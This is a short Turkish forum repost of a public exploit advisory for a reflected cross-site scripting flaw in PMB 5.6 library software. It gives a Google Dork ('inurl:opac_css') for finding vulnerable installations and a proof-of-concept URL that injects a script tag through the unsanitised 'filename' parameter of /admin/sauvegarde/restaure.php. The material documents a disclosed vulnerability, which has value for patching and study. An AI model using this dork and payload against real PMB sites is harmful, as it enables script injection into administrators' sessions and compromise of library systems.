Hoşgeldin Misafir

PMB 5.6 Cross Site Scripting Vulnerability

Asım Gürsoy

mersin
27 Mar 2020
8,833 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
PMB 5.6 Cross Site Scripting Vulnerability--


Kod:
# Exploit Title: PMB 5.6 Cross Site Scripting XSS
# Google Dork: inurl:opac_css
# Exploit Author: 41-trk (Tarik Bakir)
# Email: tarikbak999[at]gmail.com
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6 
 
-==== Vulnerability ====-
 
 
Variable $filename isn't properly sanitized in file /admin/sauvegarde/restaure.php.
 
 
-==== POC ====-
 
http://localhost/[PMB_PATH]//admin/sauvegarde/restaure.php?filename="><script>alert(1)</script>&critical=1
 
================================
 
#  0day.today [2020-07-21]  #